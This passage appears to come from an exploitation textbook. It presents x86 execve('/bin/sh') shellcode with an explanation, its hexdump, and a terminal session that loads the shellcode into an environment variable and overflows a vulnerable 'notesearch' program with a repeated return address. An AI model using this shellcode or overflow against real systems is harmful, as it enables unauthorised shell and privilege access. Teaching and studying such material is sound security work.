Graphics Programs Reference
In-Depth Information
exec_shell.s
BITS 32
jmp short two ; Jump down to the bottom for the call trick.
one:
; int execve(const char *filename, char *const argv [], char *const envp[])
pop ebx ; Ebx has the addr of the string.
xor eax, eax ; Put 0 into eax.
mov [ebx+7], al ; Null terminate the /bin/sh string.
mov [ebx+8], ebx ; Put addr from ebx where the AAAA is.
mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is.
lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr.
lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr.
mov al, 11 ; Syscall #11
int 0x80 ; Do it.
two:
call one ; Use a call to get string address.
db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed.
After terminating the string and building the arrays, the shellcode uses
the
lea
instruction (shown in bold above) to put a pointer to the argument
array into the ECX register. Loading the effective address of a bracketed
register added to a value is an efficient way to add the value to the register
and store the result in another register. In the example above, the brackets
dereference EBX+8 as the argument to
lea
, which loads that address into EDX.
Loading the address of a dereferenced pointer produces the original pointer,
so this instruction puts EBX+8 into EDX. Normally, this would require both a
mov
and an
add
instruction. When assembled, this shellcode is devoid of null
bytes. It will spawn a shell when used in an exploit.
reader@hacking:~/booksrc $ nasm exec_shell.s
reader@hacking:~/booksrc $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc $ hexdump -C exec_shell
00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |..[1..C..[..C..K|
00000010 08 8d 53 0c b0 0b cd 80 e8 e5 ff ff ff 2f 62 69 |..S........../bi|
00000020 6e 2f 73 68 |n/sh|
00000024
reader@hacking:~/booksrc $ export SHELLCODE=$(cat exec_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c0
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
